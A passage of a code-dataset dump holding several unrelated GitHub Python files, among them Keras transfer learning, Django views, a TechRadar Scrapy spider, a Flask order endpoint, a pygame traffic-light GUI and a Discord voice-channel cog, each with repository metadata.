model.predict_generator(generator, steps=step_num)\r\n np.save(file_name, bottlenect_feature)\r\n\r\n# Here is my model, which places like the top of a bottle.\r\n# And what you should pay attention to is that if the Model module applied,\r\n# then the first layer should be the Input layer, serving for indicates the\r\n# dimension of input data. This problem does not show in the Sequential module.\r\ndef myTopModel(input_shape):\r\n input_layer = Input(shape=input_shape, name='top_layer0')\r\n x = Flatten(name='top_layer1')(input_layer)\r\n x = Dense(512, activation='relu', name='top_layer2')(x)\r\n x = Dropout(0.5)(x)\r\n x = Dense(256, activation='relu', name='top_layer3')(x)\r\n x = Dropout(0.3)(x)\r\n output_layer = Dense(10, activation='softmax', name='top_layer4')(x)\r\n\r\n model = Model(inputs=input_layer, outputs=output_layer)\r\n\r\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\r\n model.compile(optimizer=sgd,\r\n loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n return model\r\n\r\n# Load the output from well-defined model and train my model.\r\ndef preTrainMyTopModel(bottle_train_file_name):\r\n vgg_train_data = np.load(bottle_train_file_name)\r\n print(\"train_data: \", vgg_train_data.shape)\r\n input_shape = vgg_train_data.shape[1:]\r\n model = myTopModel(input_shape)\r\n train_history = model.fit(x=vgg_train_data, y=train_labels, batch_size=batch_size, verbose=1, epochs=1)\r\n model.save_weights(top_model_weights_path)\r\n\r\n# This function first catenate the well-defined model with my model. Then freeze the former part\r\n# and train the latter one.\r\n# Here is a question I have spend a lot of time on it: when applying well-defined models, it will\r\n# return a Model-like object. So, it will be a good habit to set a Input layer for it, if you want\r\n# to change its architecture.\r\n# Besides, now I understand what the tensor means deeper. When adding a new layer, the function will\r\n# return a tensor instead of a layer-object or somethings else. Unlike vectors' shape, the tensor must\r\n# have more attribute, acting as a class and is more powerful than a simple shape. I think the dictionary\r\n# of all the layers must be one of them.\r\n# Therefor, when you add an old layer to a new one, the dictionary will be updated and passed. That\r\n# will be helpful when the keras does forward and backward propagation.\r\n\r\ndef smallDataModel(top_model_weights_path, input_shape):\r\n load_model = applications.VGG16(weights='imagenet', include_top=False)\r\n old_layer_num = len(load_model.layers)\r\n print('Model loaded.')\r\n input_layer = Input(shape=input_shape)\r\n load_model = load_model(input_layer)\r\n\r\n x = Flatten(name='top_layer1')(load_model)\r\n x = Dense(512, activation='relu', name='top_layer2')(x)\r\n x = Dropout(0.5)(x)\r\n x = Dense(256, activation='relu', name='top_layer3')(x)\r\n x = Dropout(0.3)(x)\r\n output_layer = Dense(10, activation='softmax', name='top_layer4')(x)\r\n\r\n model = Model(inputs=input_layer, outputs=output_layer)\r\n\r\n for layer in model.layers[:old_layer_num]:\r\n layer.trainable = True\r\n\r\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\r\n model.compile(optimizer=sgd,\r\n loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n return model\r\n\r\n\r\n# setup the orginal file path and images' properties.\r\ntrain_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/train_data'\r\nvalidation_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/validation_data'\r\ntest_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/test_data'\r\ntop_model_weights_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/top_model_weights_path.h5'\r\n\r\nimg_height = 32\r\nimg_weight = 32\r\nimg_channel = 3\r\nbatch_size = 5000\r\n\r\n# data preparation\r\ntrain_data, train_labels, validation_data, validation_labels, test_data, \\\r\ntest_labels = dataPreprocess(train_path, validation_path, test_path)\r\n\r\n# change labels from integer to one-hot code.\r\ntrain_labels = to_categorical(train_labels, num_classes=10)\r\nvalidation_labels = to_categorical(validation_labels, num_classes=10)\r\ntest_labels = to_categorical(test_labels, num_classes=10)\r\n\r\n# using VGG to pre-train model and save results\r\nbottle_train_file_name = 'bottle_train.npy'\r\n# transVGGModel(train_data, train_labels, batch_size, bottle_train_file_name)\r\n\r\n# training my model.\r\npreTrainMyTopModel(bottle_train_file_name)\r\n\r\n\r\n##### This works as the second way for applying transfer learning. #######\r\n# I don't want to write two files to talk about the same topic. So I write them in one file.\r\ninput_shape = train_data.shape[1:]\r\nmySmallDataModel = smallDataModel(top_model_weights_path, input_shape)\r\n\r\ndatagen = ImageDataGenerator(rotation_range=10, width_shift_range=0.1, height_shift_range=0.1,\r\n horizontal_flip=True, vertical_flip=True, rescale=1.0 / 255)\r\ntrain_generator = datagen.flow(x=train_data, y=train_labels, batch_size=batch_size)\r\n\r\nvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\r\nvalidation_generator = validation_datagen.flow(x=validation_data, y=validation_labels, batch_size=batch_size)\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\r\ntest_generator = test_datagen.flow(x=test_data, y=test_labels, batch_size=batch_size)\r\n\r\ntrain_steps_per_epoch = train_data.shape[0] // batch_size\r\nvali_steps_per_epoch = validation_data.shape[0] // batch_size\r\ntest_steps_per_epoch = test_data.shape[0] // batch_size\r\nmyFitHistory = mySmallDataModel.fit_generator(train_generator, steps_per_epoch=train_steps_per_epoch, epochs=10,\r\n validation_data=validation_generator,\r\n validation_steps=vali_steps_per_epoch)\r\n\r\nmyPredicHis = mySmallDataModel.predict_generator(test_generator, steps=test_steps_per_epoch, verbose=1)\r\n", "repo_name": "Yueyuhou/Transfer-learning-and-data-augment-practise-with-Keras.", "sub_path": "SmallData.py", "file_name": "SmallData.py", "file_ext": "py", "file_size_in_byte": 10425, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 101, "usage_type": "call"}, {"api_name": "keras.applications.VGG16", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 104, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 107, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 114, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 115, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 116, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 118, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 119, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 120, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 122, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 132, "usage_type": "call"}, {"api_name": "keras.applications.VGG16", "line_number": 152, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 152, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 155, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 158, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 159, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 160, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 161, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 162, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 163, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 165, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 170, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 193, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 194, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 195, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 210, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 214, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 217, "usage_type": "call"}]} +{"seq_id": "36521275966", "text": "from django.shortcuts import render\nfrom projects.models import Project\n\n# Create your views here.\n\ndef project_index(request): # @4.0\n # query --> A command that allows you to create, retrieve, update or delete objects(rows) in your database.\n \n projects = Project.objects.all() # query to get all objects in the table i.e projects.\n \n context = { # The context dictionary is used to send information to our template\n 'projects': projects # We assign our queryset of all projects to entry named 'projects'\n } # Every view function we create needs to have a context dictionary.\n\n return render(request, 'project_index.html', context) # render basically takes in the request, template and the queries made in context dictionary.\n\n\ndef project_detail(request, pk): # @4.1\n project = Project.objects.get(pk=pk) # This query retrieves the project with primary key(pk) equal to that in the function argument.\n\n context = {\n 'project': project\n }\n\n return render(request, 'project_detail.html', context)\n\n\n\n\n\n", "repo_name": "ameerhkhan/Django-Practice-Exercises", "sub_path": "second-django-app/personal_portfolio/projects/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "projects.models", "line_number": 9, "usage_type": "name"}, {"api_name": "projects.models.Project.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 9, "usage_type": "name"}, {"api_name": "projects.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.get", "line_number": 19, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "20410887378", "text": "import nltk\nimport scrapy\nfrom ..items import TechradarItem\nimport time\nimport random\nimport re\nfrom bs4 import BeautifulSoup\nfrom techradar.spiders.preprocess import PreprocessArticle\nfrom techradar.spiders.uploader import upload_article\nimport os\nfrom ..settings import save_paths\nfrom collections import defaultdict\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\n# print(stopwords.words('english'))\n\n\nclass ReviewsSpider(scrapy.Spider):\n name = 'reviews'\n \n month = 1\n year = 2020\n start_urls = [f'https://www.techradar.com/reviews/archive/{year}/{month}/']\n fpath = os.getcwd()\n output = f\"\"\"articles_{str(month)}_{str(year)}.xml\"\"\"\n \n save_as = f\"\"\"{fpath}/articles_{str(month)}_{str(year)}.xml\"\"\"\n # word_counter = defaultdict(lambda: 0)\n # if not os.path.isfile(save_as):\n # with open(save_as,'a') as f:\n # pass\n\n def parse(self, response, **kwargs):\n \n all_links = []\n items = TechradarItem()\n # xpath to extract the links from each page\n scrapped_links = response.xpath('//div/a/@href').getall()\n scrapped_links2 = response.xpath('//li/a/@href').getall()\n all_links.extend(scrapped_links)\n all_links.extend(scrapped_links2)\n scrapped_links = []\n \n # self.month += 1\n ReviewsSpider.month += 1 # increment month for link pagination\n next_page = f'https://www.techradar.com/reviews/archive/{str(ReviewsSpider.year)}/{str(ReviewsSpider.month)}/'\n \n for link in all_links:\n if not re.search(\"https://www.techradar.com/reviews/archive/.*\", link): # filter unnessacary links (eg archive)\n \n try:\n print(link)\n print(response)\n print('\\n\\n\\n')\n # Get only the links from news or reviews using regex\n if len(re.findall(r\"https://www.techradar.com/(reviews|news)/.\", link)) > 0:\n if link not in scrapped_links:\n scrapped_links.append(link)\n time.sleep(random.randint(0,1))\n yield scrapy.Request(link, callback = self.parse_link_contents)\n \n \n # items['links'] = link\n # yield items\n\n except IndexError:\n # response.follow(next_page, callback=self.parse)\n pass\n\n except Exception as e:\n print(e)\n pass\n\n time.sleep(random.randint(1,3)) # Sleep before the next request\n\n if (ReviewsSpider.month) <= 2:\n # Callback on it's self to visit next link (archives of months)\n yield response.follow(next_page, callback=self.parse)\n \n # time.sleep(5)\n # upload_article(source_name = save_paths, target_name='articles_2020.xml')\n\n # else:\n # # UPLOADE TO AZURE\n # try:\n # upload_article(source_name = save_paths, target_name='articles_2020.xml')\n # # os.remove(ReviewsSpider.save_as)\n # except Exception as e:\n # print(e)\n \n \n\n \n def parse_link_contents(self,response,**kwargs):\n # full_art = response.meta.get('full_art')\n content = response.text\n soup = BeautifulSoup(content, 'html.parser')\n content = soup.prettify()\n link_name = response.url.split('/')[-2] + \"_\" +response.url.split('/')[-1]\n title = response.url.split('/')[-1]\n \n with open(save_paths,'a') as f:\n f.write(PreprocessArticle().parse_paragraphs(content,link_name,title))\n f.close()\n\n \n\n\n\n\n# TODO Proxy rotation - (if needed)\n# TODO save file to Azure File server and remove file \n# connect GoogleDrive API as FileServer\n", "repo_name": "panostraf/search_engines_crawler", "sub_path": "techradar/techradar/spiders/reviews_2.py", "file_name": "reviews_2.py", "file_ext": "py", "file_size_in_byte": 3944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "scrapy.Spider", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 24, "usage_type": "call"}, {"api_name": "items.TechradarItem", "line_number": 36, "usage_type": "call"}, {"api_name": "re.search", "line_number": 49, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 60, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 74, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 97, "usage_type": "call"}, {"api_name": "settings.save_paths", "line_number": 102, "usage_type": "argument"}, {"api_name": "techradar.spiders.preprocess.PreprocessArticle", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "34996890557", "text": "from flask import Blueprint\nfrom flask_api import status\nimport mysql.connector\nimport json\nimport conf\n\norder = Blueprint('order', __name__)\n\n\n@order.route('/order//', methods=['GET'])\ndef handle(session_id, order_id):\n # session_ids are 16 characters long\n if (len(session_id) > 16):\n return '', status.HTTP_400_BAD_REQUEST\n\n connector = mysql.connector.connect(\n user=conf.user,\n database=conf.database,\n passwd=conf.passwd,\n host=conf.host,\n port=conf.port)\n\n answer = {}\n\n cursor = connector.cursor()\n\n return_status = cursor.callproc('get_order', args=[session_id, order_id, 0])\n\n if(return_status[2] == 0):\n # success!\n result = next(cursor.stored_results())\n\n line = next(result)\n\n answer['ordered_on'] = line[0]\n answer['order_total'] = line[1]\n answer['order_status'] = line[2]\n answer['items'] = []\n\n cursor.callproc('get_order_items', args=[order_id])\n\n result = next(cursor.stored_results())\n\n for line in result:\n answer['items']. append({'item_id': line[0], 'amount': line[1]})\n\n return json.dumps(answer, default=str), status.HTTP_200_OK\n elif(return_status[2] == 1 or return_status[2] == 2):\n # user id could not be found or didn't own the order\n connector.close()\n return '', status.HTTP_401_UNAUTHORIZED\n else:\n # oh noes\n connector.close()\n return '', status.HTTP_500_INTERNAL_SERVER_ERROR\n", "repo_name": "qwertxzy/nozama-api", "sub_path": "endpoints/order.py", "file_name": "order.py", "file_ext": "py", "file_size_in_byte": 1531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_400_BAD_REQUEST", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 14, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 16, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 16, "usage_type": "name"}, {"api_name": "conf.user", "line_number": 17, "usage_type": "attribute"}, {"api_name": "conf.database", "line_number": 18, "usage_type": "attribute"}, {"api_name": "conf.passwd", "line_number": 19, "usage_type": "attribute"}, {"api_name": "conf.host", "line_number": 20, "usage_type": "attribute"}, {"api_name": "conf.port", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_200_OK", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 47, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_401_UNAUTHORIZED", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 51, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "40348893038", "text": "import pygame, pickle, sys, time, random, math\nfrom _thread import *\n\nstop_threads=True\npygame.display.init()\npygame.font.init()\n\nredAmber=pygame.image.load(\"TL A R.png\")\nred=pygame.image.load(\"TL R.png\")\namber=pygame.image.load(\"TL A.png\")\ngreen=pygame.image.load(\"TL G.png\")\n\nWIDTH=1200\nHEIGHT=800\nBACKGROUND=pygame.Color(\"#EAEAEA\")\nBLUE=pygame.Color(\"#00A896\")\nORANGE=pygame.Color(\"#89043D\")\nLB=pygame.Color(\"#2FE6DE\")\n\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\n\nstore = {TL:redAmber, Road:roadyBoi}\n\nclass Object(object):\n def __init__(self, x, y, width, height, typ):\n self.typ=typ\n self.x=x\n self.y=y\n self.width=width\n self.height=height\n\n def move(self, x, y, win):\n self.x=x\n self.y=y\n\n def draw(self, win):\n win.blit(redAmber, (self.x+1, self.y))\n pygame.draw.rect(win, self.typ, (self.x, self.y, self.width, self.height), 2)\n\nclass TrafficLight(Object):\n def __init__(self, x, y, timeOn, timeOff, points):\n width=20\n height=20\n Object.__init__(self, x, y, width, height, \"TL\")\n self.x=x\n self.y=y\n self.timeOn=timeOn\n self.timeOff=timeOff\n self.points=points\n\n \ndef drawText(win, text, x, y, size, colour):\n try:\n font = pygame.font.SysFont(\"Comic Sans\", size)\n toBlit = font.render(text, 1, colour, False)\n win.blit(toBlit, ( int( x-(toBlit.get_width()/2) ) , int( y-(toBlit.get_height()/2)) ))\n except:\n print('Font Error, Saw It Coming Ngl')\n\ndef normalMenu(win):\n pygame.draw.rect(win,BLUE, (0, 600, 100, 100), 2)\n drawText(win, \"Lights\", 50, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 600, 100, 100), 2)\n drawText(win, \"Roads\", 150, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 700, 100, 100), 2)\n drawText(win, \"Junctions\", 50, 720, 30, BLUE)\n pygame.draw.rect(win,BLUE, (0, 700, 100, 100), 2)\n drawText(win, \"Other\", 150, 720, 30, BLUE)\n \ndef drawAll(win, listy):\n win.fill(BACKGROUND)\n drawText(win, \"Return To Menu\", 60, 20, 20, BLUE)\n pygame.draw.rect(win,BLUE, (0, 10, 120, 20), 2)\n normalMenu(win)\n \n for i in listy:\n i.draw(win)\n\n pygame.display.flip()\n \ndef main(win):\n print(\"Design Phase Started\")\n pygame.display.set_caption('Design Phase')\n\n itemList=[]\n light=TrafficLight(40, 645, None, None, 0)\n itemList.append(light)\n\n while True:\n drawAll(win, itemList)\n \n mainMenu(win)\n\n\n\n\ndef threaded_title(win, WIDTH, HEIGHT):\n global stop_threads\n while stop_threads:\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE)\n drawText(win, \"Click To Start\", int(WIDTH/2), int(-100+HEIGHT/2), 50, BLUE)\n pygame.display.flip() \n else:\n break\n time.sleep(0.5)\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE) \n pygame.display.flip()\n else:\n break\n time.sleep(0.5)\n print(\"Thread Ended\")\n return\ndef mainMenu(win):\n global stop_threads \n print(\"Running Main Menu\")\n pygame.display.set_caption(\"Reinforcement Learning Traffic Lights\") \n stop_threads=True \n run = True \n clock = pygame.time.Clock() \n start_new_thread(threaded_title, (win, WIDTH, HEIGHT))\n print(\"Thread Started\") \n while run:\n clock.tick(30) \n for event in pygame.event.get():\n if event.type==pygame.QUIT:#Quit\n stop_threads=False\n print(\"Goodbye!\")\n pygame.quit()\n sys.exit()\n if event.type==pygame.MOUSEBUTTONDOWN:\n run = False\n stop_threads=False\n main(win)\nwhile True:\n try:\n mainMenu(win)\n except:\n sys.exit()\n", "repo_name": "BigDataCrackhead/NEA", "sub_path": "Old Versions/V2.py", "file_name": "V2.py", "file_ext": "py", "file_size_in_byte": 4003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.display.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 104, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 111, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 123, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 132, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 134, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "17069256446", "text": "#!/usr/bin/env python3\n\nimport pytz\nfrom datetime import datetime\nfrom random import choice\n\nfrom tabulate import tabulate\n\n\nZONES = {\n 'Cape Town': 'Africa/Johannesburg',\n 'London': 'Europe/London',\n 'Toronto': 'Canada/Eastern',\n 'Kathmandu': 'Asia/Kathmandu',\n 'Nairobi': 'Africa/Nairobi',\n}\nDATE_FORMAT = '%d-%m-%y %H:%M:%S'\nHEADER = ['Location', 'Date', 'Time']\nTABLE_FORMAT = 'pretty'\nTABLE_FORMATS = [\n 'plain',\n 'simple',\n 'github',\n 'grid',\n 'fancy_grid',\n 'pipe',\n 'orgtbl',\n 'jira',\n 'presto',\n 'pretty',\n 'psql',\n]\n\n\ndef main(fmt=None, header=[]):\n table = []\n for label, tz in ZONES.items():\n dt_str = datetime.now(pytz.timezone(tz)).strftime(DATE_FORMAT)\n table.append([label] + dt_str.split())\n\n fmt = fmt or TABLE_FORMAT\n print(tabulate(table, headers=header, tablefmt=fmt))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "joshuaberetta/times", "sub_path": "times.py", "file_name": "times.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 38, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "31093097958", "text": "from __future__ import annotations\nfrom typing import Optional\n\nimport discord\nimport re\nfrom discord import app_commands, utils\nfrom discord.ext import commands, tasks\nfrom collections import defaultdict\nimport json\nimport asyncio\nfrom bot.common import GuildBot, extension_setup\nfrom pathlib import Path\n\n\nclass SquadVoice(commands.Cog):\n data_directory = \"data/squad_voice/\"\n channel_creators_filename = \"channel-creators.json\"\n temporary_channels_filename = \"temporary-channels.json\"\n\n def __init__(self, bot: GuildBot):\n self.bot = bot\n self.channel_creators = {}\n self.all_temporary_channels = {}\n\n self.channel_creators_path = Path(self.data_directory, self.channel_creators_filename).resolve()\n self.temporary_channels_path = Path(self.data_directory, self.temporary_channels_filename).resolve()\n\n self.voice_creator_commands: Optional[app_commands.Group] = None\n self.created_channel_commands: Optional[app_commands.Group] = None\n\n async def cog_load(self) -> None:\n self.create_command_groups()\n self.register_voice_creator_commands_to_group()\n self.register_created_channel_commands_to_group()\n\n Path(self.data_directory).mkdir(exist_ok=True)\n self.channel_creators_path.touch(exist_ok=True)\n self.temporary_channels_path.touch(exist_ok=True)\n\n self.bot.loop.create_task(self.load_from_json())\n\n def cog_unload(self) -> None:\n if self.channel_creators:\n self.dump_channel_creators()\n if self.all_temporary_channels:\n self.dump_temporary_channels()\n\n def dump_channel_creators(self):\n data = [{\"channel_id\": channel_creator.channel.id,\n \"create_name\": channel_creator.create_name,\n \"create_category_id\": channel_creator.create_category.id if channel_creator.create_category else None,\n \"create_user_limit\": channel_creator.create_user_limit}\n for channel_creator in self.channel_creators.values()]\n with open(self.channel_creators_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n def dump_temporary_channels(self):\n data = [{\"channel_id\": temporary_channel.channel.id,\n \"index\": temporary_channel.index,\n \"creator\": temporary_channel.creator.channel.id}\n for temporary_channel in self.all_temporary_channels.values()]\n with open(self.temporary_channels_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n async def load_channel_creators_from_json(self):\n await self.bot.wait_until_ready()\n\n with open(self.channel_creators_path, \"r\") as readfile:\n try:\n channel_creators_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.channel_creators = {}\n\n for channel_creator_data in channel_creators_data:\n try:\n channel_creator_data[\"channel\"] = await self.bot.fetch_channel(channel_creator_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n del channel_creator_data[\"channel_id\"]\n if channel_creator_data[\"create_category_id\"]:\n try:\n channel_creator_data[\"create_category\"] = await self.bot.fetch_channel(channel_creator_data[\"create_category_id\"])\n except discord.NotFound:\n channel_creator_data[\"create_category\"] = channel_creator_data[\"channel\"].category\n else:\n channel_creator_data[\"create_category\"] = None\n del channel_creator_data[\"create_category_id\"]\n channel_creator = ChannelCreator(self, **channel_creator_data)\n self.channel_creators[channel_creator.channel.id] = channel_creator\n\n async def load_temporary_channels_from_json(self):\n with open(self.temporary_channels_path, \"r\") as readfile:\n try:\n temporary_channels_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.all_temporary_channels = {}\n\n for temporary_channel_data in temporary_channels_data:\n try:\n channel: discord.VoiceChannel = await self.bot.fetch_channel(temporary_channel_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n if len(channel.members) == 0:\n await channel.delete()\n elif channel and 